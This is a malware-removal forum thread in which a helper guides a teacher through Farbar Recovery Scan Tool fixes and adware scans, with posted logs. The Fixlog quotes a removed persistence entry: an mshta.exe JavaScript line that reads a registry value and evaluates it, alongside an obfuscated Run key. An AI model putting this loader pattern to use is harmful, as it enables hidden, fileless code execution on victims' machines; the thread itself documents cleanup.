2016-08-12 16:50 - 2006-11-02 08:33 - 88866816 _____ C:\Windows\system32\config\software_previous
2016-08-12 16:49 - 2016-07-02 10:39 - 00000000 ____D C:\Users\JHS-JJS\AppData\Local\b263cb
2016-08-12 16:49 - 2015-03-04 11:39 - 00000000 ____D C:\Program Files\Common Files\Symantec Shared
2016-08-12 16:49 - 2008-09-22 10:14 - 00000000 ____D C:\Program Files (x86)\Digital Line Detect
2016-08-12 16:49 - 2006-11-02 09:34 - 00000000 ____D C:\Windows\system32\spool
2016-08-12 16:49 - 2006-11-02 09:34 - 00000000 ____D C:\Windows\system32\Msdtc
2016-08-12 16:49 - 2006-11-02 09:33 - 00000000 __RSD C:\Windows\Media
2016-08-12 16:49 - 2006-11-02 09:33 - 00000000 ____D C:\Windows\rescache
2016-08-12 16:49 - 2006-11-02 09:33 - 00000000 ____D C:\Windows\registration
2016-08-12 16:49 - 2006-11-02 09:33 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-08-12 16:43 - 2006-11-02 08:33 - 23855104 _____ C:\Windows\system32\config\system_previous
2016-08-12 16:33 - 2006-11-02 08:33 - 82051072 _____ C:\Windows\system32\config\components_previous
2016-08-12 16:33 - 2006-11-02 08:33 - 00262144 _____ C:\Windows\system32\config\sam_previous
2016-08-12 15:19 - 2016-07-05 11:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-08-12 13:27 - 2016-07-05 11:48 - 00000850 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-08-12 12:52 - 2008-10-28 14:35 - 00000000 ____D C:\Users\JHS-JJS
2016-08-12 12:31 - 2006-11-02 08:33 - 00262144 _____ C:\Windows\system32\config\security_previous
2016-08-12 12:31 - 2006-11-02 08:33 - 00262144 _____ C:\Windows\system32\config\default_previous
2016-08-12 12:28 - 2012-07-25 10:45 - 00000000 ____D C:\Program Files (x86)\Yahoo!
2016-08-12 12:28 - 2009-01-29 00:41 - 00000000 ____D C:\Program Files (x86)\MySpace
2016-08-12 12:28 - 2008-09-22 10:09 - 00000000 ____D C:\Program Files (x86)\Java
2016-08-11 16:52 - 2016-06-28 11:18 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox(69)
2016-08-09 12:39 - 2010-03-20 15:01 - 00000000 ____D C:\ProgramData\Norton
2016-08-07 12:29 - 2010-12-29 11:54 - 00000000 ____D C:\Users\JHS-JJS\Desktop\New Folder
2016-08-05 16:04 - 2016-07-05 11:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service(70)
2016-08-02 11:34 - 2006-11-02 11:21 - 00375264 _____ C:\Windows\system32\FNTCACHE.DAT
2016-08-02 10:56 - 2013-08-14 19:47 - 00000000 ____D C:\Windows\system32\MRT
2016-08-02 10:47 - 2006-11-02 08:35 - 144749672 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe

==================== Files in the root of some directories =======

2009-11-10 11:23 - 2009-11-10 11:23 - 0024226 _____ () C:\Users\JHS-JJS\AppData\Roaming\UserTile.png
2008-10-28 20:33 - 2016-07-16 10:23 - 0002276 _____ () C:\Users\JHS-JJS\AppData\Roaming\wklnhst.dat
2008-10-29 16:44 - 2016-08-21 13:50 - 0000680 _____ () C:\Users\JHS-JJS\AppData\Local\d3d9caps.dat
2008-10-31 09:35 - 2015-04-30 12:14 - 0015360 _____ () C:\Users\JHS-JJS\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-01-30 15:51 - 2013-01-30 15:51 - 0301806 _____ () C:\Users\JHS-JJS\AppData\Local\dd_ReportViewerMSI7E90.txt
2013-01-30 15:51 - 2013-01-30 15:51 - 0010978 _____ () C:\Users\JHS-JJS\AppData\Local\dd_ReportViewerUI7E90.txt
2014-04-26 17:10 - 2014-04-26 17:11 - 0442244 _____ () C:\Users\JHS-JJS\AppData\Local\dd_vcredistMSI6163.txt
2014-04-26 17:10 - 2014-04-26 17:11 - 0012204 _____ () C:\Users\JHS-JJS\AppData\Local\dd_vcredistUI6163.txt
2008-11-09 18:00 - 2009-10-14 15:53 - 0008248 _____ () C:\Users\JHS-JJS\AppData\Local\en.ini
2011-05-18 19:16 - 2011-06-03 07:28 - 0001940 _____ () C:\Users\JHS-JJS\AppData\Local\{96C87F53-AC72-4604-A9CC-186A49F17F3C}.ini
2016-05-11 14:26 - 2016-05-11 14:26 - 0004908 _____ () C:\ProgramData\lbogtyso.zat
2016-05-11 14:26 - 2016-05-11 14:26 - 0000016 _____ () C:\ProgramData\mntemp

Files to move or delete:
====================
C:\Users\JHS-JJS\epson12578.exe
C:\Users\JHS-JJS\garmin_rmu_cnnant2010_20.exe
C:\Users\JHS-JJS\gimp-2.6.6-i686-setup.exe
C:\Users\JHS-JJS\Install_AIM.exe
C:\Users\JHS-JJS\MorphVOXPro4_Install-1.exe

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-08-30 10:47

==================== End of FRST.txt ============================

#5
zep516

Posted 30 August 2016 - 11:35 AM

Trusted Helper

Malware Removal
8,093 posts

Hello,

Please uninstall these programs. If they don't uninstall skip it and continue with instructions.
Download Updater
File Opener Pro

Next

Download the enclosed =>

fixlist.txt 5.56KB 261 downloads Save it in the location FRST64 is (Your Desktop) Run FRST and click on the Fix button. Wait until finished.

The tool will make a log called (Fixlog.txt). in the location FRST is, (Your Desktop) Please post it to your reply.

#6
[email protected]

Posted 30 August 2016 - 12:14 PM

Member

Topic Starter
Member
18 posts

Hello zep516, Thanks for the quick response. I'm a school teacher and I have classes today so I will not be able to follow your instructions until later today( sometime after 6pm eastern)

#7
zep516

Posted 30 August 2016 - 12:18 PM

Trusted Helper

Malware Removal
8,093 posts

Then it's recess time. See you after 6 then.

Thanks
Joe

#8
[email protected]

Posted 30 August 2016 - 04:58 PM

Member

Topic Starter
Member
18 posts

here is Fixlog.txt. LOL at recess, i teach high school kids, its my second year, some students are older than i am.

Fix result of Farbar Recovery Scan Tool (x64) Version: 29-08-2016
Ran by JHS-JJS (30-08-2016 16:19:45) Run:1
Running from C:\Users\JHS-JJS\Desktop
Loaded Profiles: JHS-JJS (Available Profiles: JHS-JJS)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcmscsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service"
HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <===== ATTENTION
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Classes\46bb36: "C:\Windows\system32\mshta.exe" "javascript:JuJWx1="H";J1I8=new ActiveXObject("WScript.Shell");O9xZdAbO="msF";D8dwB=J1I8.RegRead("HKCU\\software\\tipm\\igbespedi");Nzqpd2a="y2v1QG";eval(D8dwB);PFf8KK2H="ovZ";" <===== ATTENTION
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Run: [**njop<*>] => "C:\Users\JHS-JJS\AppData\Local\b263cb\84e7ae.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\MountPoints2: {5c7703ed-05b0-11de-9b6c-00038a000015} - M:\LaunchU3.exe
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\MountPoints2: {8817984c-e0b8-11e2-928d-00038a000015} - L:\VZW_Software_upgrade_assistant_installer.exe
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => No File
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.msn.com/?ocid=EIE9HP&PC=UP50
SearchScopes: HKLM-x32 -> {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50TB50CLie7
SearchScopes: HKLM-x32 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKLM-x32 -> {D943EABA-8E9F-40BE-861D-26636C0303F1} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=msie70a
SearchScopes: HKU\.DEFAULT -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-19 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-20 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50TB50CLie7
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> No File
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {40D41A8B-D79B-43D7-99A7-9EE0F344C385} - No File
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
CHR Extension: (Wajam) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp [2013-11-15] [UpdateUrl: hxxp://www.wajam.com/update/Chrome/chrome_addon_updates.xml] <==== ATTENTION
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
C:\Users\JHS-JJS\epson12578.exe
C:\Users\JHS-JJS\garmin_rmu_cnnant2010_20.exe
C:\Users\JHS-JJS\gimp-2.6.6-i686-setup.exe
C:\Users\JHS-JJS\Install_AIM.exe
C:\Users\JHS-JJS\MorphVOXPro4_Install-1.exe
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp:
*****************

Processes closed successfully.
Restore point was successfully created.
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\MCODS" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\mcmscsvc" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\MCODS" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\MpfService" => key removed successfully
HKLM\Software\Classes\cmdfile\DefaultIcon\\Default => value restored successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Classes\46bb36" => key removed successfully
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**njop<*> => value removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c7703ed-05b0-11de-9b6c-00038a000015}" => key removed successfully
HKCR\CLSID\{5c7703ed-05b0-11de-9b6c-00038a000015} => key not found.
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8817984c-e0b8-11e2-928d-00038a000015}" => key removed successfully
HKCR\CLSID\{8817984c-e0b8-11e2-928d-00038a000015} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\GDriveSharedOverlay" => key removed successfully
HKCR\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => key not found.
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{443789B7-F39C-4b5c-9287-DA72D38F4FE6}" => key removed successfully
HKCR\Wow6432Node\CLSID\{443789B7-F39C-4b5c-9287-DA72D38F4FE6} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\Wow6432Node\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{D943EABA-8E9F-40BE-861D-26636C0303F1}" => key removed successfully
HKCR\Wow6432Node\CLSID\{D943EABA-8E9F-40BE-861D-26636C0303F1} => key not found.
"HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{443789B7-F39C-4b5c-9287-DA72D38F4FE6}" => key removed successfully
HKCR\CLSID\{443789B7-F39C-4b5c-9287-DA72D38F4FE6} => key not found.
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => key removed successfully
HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => key not found.
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4efb-9B51-7695ECA05670}" => key removed successfully
HKCR\Wow6432Node\CLSID\{02478D38-C3F9-4efb-9B51-7695ECA05670} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}" => key removed successfully
HKCR\Wow6432Node\CLSID\{5C255C8A-E604-49b4-9D64-90988571CECB} => key not found.
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => value removed successfully
HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => key not found.
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{40D41A8B-D79B-43D7-99A7-9EE0F344C385} => value removed successfully
HKCR\CLSID\{40D41A8B-D79B-43D7-99A7-9EE0F344C385} => key not found.
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => value removed successfully
HKCR\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => key not found.
C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp <==== ATTENTION => not found
IpInIp => service removed successfully
C:\Users\JHS-JJS\epson12578.exe => moved successfully
C:\Users\JHS-JJS\garmin_rmu_cnnant2010_20.exe => moved successfully
C:\Users\JHS-JJS\gimp-2.6.6-i686-setup.exe => moved successfully
C:\Users\JHS-JJS\Install_AIM.exe => moved successfully
C:\Users\JHS-JJS\MorphVOXPro4_Install-1.exe => moved successfully

========= bitsadmin /reset /allusers =========

BITSADMIN version 3.0 [ 7.0.6001 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

Unable to cancel {8CB8F554-37FB-4672-AA42-62E0E271AAEC}.
0 out of 1 jobs canceled.

========= End of CMD: =========

========= netsh winsock reset catalog =========

Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.

========= End of CMD: =========

========= ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully

========= End of RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 917979200 B
Java, Flash, Steam htmlcache => 506 B
Windows/system/drivers => 284065193 B
Edge => 0 B
Chrome => 13451254 B
Firefox => 28315944 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 66228 B
systemprofile32 => 24036278 B
LocalService => 132244 B
LocalService => 0 B
NetworkService => 588432 B
NetworkService => 0 B
JHS-JJS => 43605029 B

RecycleBin => 2695360368 B
EmptyTemp: => 3.7 GB temporary data Removed.

================================

The system needed a reboot.

==== End of Fixlog 16:25:18 ====

#9
zep516

Posted 30 August 2016 - 05:02 PM

Trusted Helper

Malware Removal
8,093 posts

Well done.

We need to run 3 scans for adware and post the log reports from adwCleaner, Junk Removal Tool, Malwarebytes;

To do that:

Next

Please download AdwCleaner by Xplode onto your Desktop.

Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click the Scan button and wait for the process to complete.
Click the logfile button and the log will open in Notepad.
Click on the Clean button follow the prompts.
A log file will automatically open after the scan has finished and the PC has rebooted.
Please post the content of that log file with your next answer.
The report will be saved in the C:\AdwCleaner folder.

Next

Please download Junkware Removal Tool to your Desktop.
Please close your security software to avoid potential conflicts. See Here how to disable you security protection (Anti Virus)
Run the tool by double-clicking it. If you are using Windows Vista or 7, right-mouse click it and select Run as administrator.
The tool will open and start scanning your system.
Please be patient as this can take a while to complete, depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.
Please post the contents of JRT.txt into your reply.

Next
Please download Malwarebytes Anti-Malware to your desktop.
Double-click mbam-setup-version.exe and follow the prompts to install the program.
Launch Malwarebytes Anti-Malware
Then click Finish.
If an update is found, you will be prompted to download and install the latest version.
On the Settings tab > Detection and Protection subtab, Detection Options, tick the box 'Scan for rootkits'.
Once the program has loaded, select Scan now. Or select the Threat Scan from the Scan menu.
When the scan is complete , make sure that that all Threats are selected, and click Remove Selected.
Reboot your computer if prompted.

Posting the Malwarebytes log.

[list]
After the restart once you are back at your desktop, open MBAM once more.
Click on the History tab > Application Logs.
Double click on the Scan Log which shows the Date and time of the scan just performed.
Click 'Export'.
Click 'Text file (*.txt)'
In the Save File dialog box which appears, click on Desktop.
In the File name: box type a name for your scan log.
A message box named 'File Saved' should appear stating "Your file has been successfully exported".
Click Ok
post that saved log to your next reply.

In your next reply post;
The AdwCleaner [C1].txt Log
The JRT.txt Log
Malwarebyteslog

#10
[email protected]

Posted 31 August 2016 - 10:34 AM

Member

Topic Starter
Member
18 posts

First log, downloading junkware next,

# AdwCleaner v6.010 - Logfile created 31/08/2016 at 12:20:42
# Updated on 12/08/2016 by ToolsLib
# Database : 2016-08-30.2 [Server]
# Operating System : Windows ™ Vista Home Premium Service Pack 2 (X64)
# Username : JHS-JJS - JHS-JJS-DELL8MG
# Running from : C:\Users\JHS-JJS\Desktop\NEW PROGRAMS\adwcleaner_6.010.exe
# Mode: Scan
# Support : https://toolslib.net/forum

***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

Folder Found: C:\Users\JHS-JJS\AppData\Local\AOL Toolbar
Folder Found: C:\Users\JHS-JJS\AppData\Local\Wajam
Folder Found: C:\Users\JHS-JJS\AppData\Local\WeatherAlerts
Folder Found: C:\Users\JHS-JJS\AppData\LocalLow\Yahoo!\Companion
Folder Found: C:\Users\JHS-JJS\AppData\Roaming\download Manager
Folder Found: C:\Program Files\AOL Toolbar
Folder Found: C:\Users\JHS-JJS\AppData\Local\VirtualStore\Program Files (x86)\Yahoo!\Companion
Folder Found: C:\ProgramData\AOL Toolbar
Folder Found: C:\ProgramData\Viewpoint
Folder Found: C:\ProgramData\w3i
Folder Found: C:\ProgramData\Application Data\AOL Toolbar
Folder Found: C:\ProgramData\Application Data\Viewpoint
Folder Found: C:\ProgramData\Application Data\w3i
Folder Found: C:\Program Files (x86)\AOL Toolbar
Folder Found: C:\Program Files (x86)\w3i
Folder Found: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Yahoo! Companion
Folder Found: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Yahoo!\Companion
Folder Found: C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp

***** [ Files ] *****

File Found: C:\Windows\Downloaded Program Files\popcaploader.inf

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious keys found.

***** [ Shortcuts ] *****

No infected shortcut found.

***** [ Scheduled Tasks ] *****

No malicious task found.

***** [ Registry ] *****

Key Found: HKLM\SOFTWARE\Classes\CrossriderApp0005058.BHO
Key Found: HKLM\SOFTWARE\Classes\CrossriderApp0005058.BHO.1
Key Found: HKLM\SOFTWARE\Classes\CrossriderApp0005058.Sandbox
Key Found: HKLM\SOFTWARE\Classes\CrossriderApp0005058.Sandbox.1
Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\citysearch.com
Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\hiphopmyway.com
Key Found: HKLM\SOFTWARE\Classes\PopCapLoader.PopCapLoaderCtrl2
Key Found: HKLM\SOFTWARE\Classes\PopCapLoader.PopCapLoaderCtrl2.1
Key Found: HKLM\SOFTWARE\Classes\Sample.BrowserHandler
Key Found: HKLM\SOFTWARE\Classes\Sample.BrowserHandler.1
Key Found: HKLM\SOFTWARE\Classes\Sample.YTBPartnerSample
Key Found: HKLM\SOFTWARE\Classes\Sample.YTBPartnerSample.1
Key Found: HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar
Key Found: HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar.1
Key Found: [x64] HKLM\SOFTWARE\Classes\CLSID\{18F33C35-8EF2-40D7-8BA4-932B0121B472}
Key Found: [x64] HKLM\SOFTWARE\Classes\Interface\{3408AC0D-510E-4808-8F7B-6B70B1F88534}
Key Found: [x64] HKLM\SOFTWARE\Classes\Interface\{7697BC38-D0FA-454B-AC75-968B4CCABFCE}
Key Found: [x64] HKLM\SOFTWARE\Classes\Interface\{E4E3E0F8-CD30-4380-8CE9-B96904BDEFCA}
Key Found: [x64] HKLM\SOFTWARE\Classes\Interface\{FE8A736F-4124-4D9C-B4B1-3B12381EFABE}
Key Found: [x64] HKLM\SOFTWARE\Classes\Interface\{371AD4A5-1520-4AA2-A8A4-F9AD3BAC6957}
Key Found: [x64] HKLM\SOFTWARE\Classes\Interface\{7F124846-5453-4BB8-A41D-E11481FFC9DF}
Key Found: [x64] HKLM\SOFTWARE\Classes\Interface\{8FD65019-BF09-45DA-AD81-E95AE911F1FD}
Key Found: HKLM\SOFTWARE\Classes\AppID\{D616A4A2-7B38-4DBC-9093-6FE7A4A21B17}
Key Found: HKLM\SOFTWARE\Classes\AppID\{7375D127-3955-4654-8E7D-1949A7A9C902}
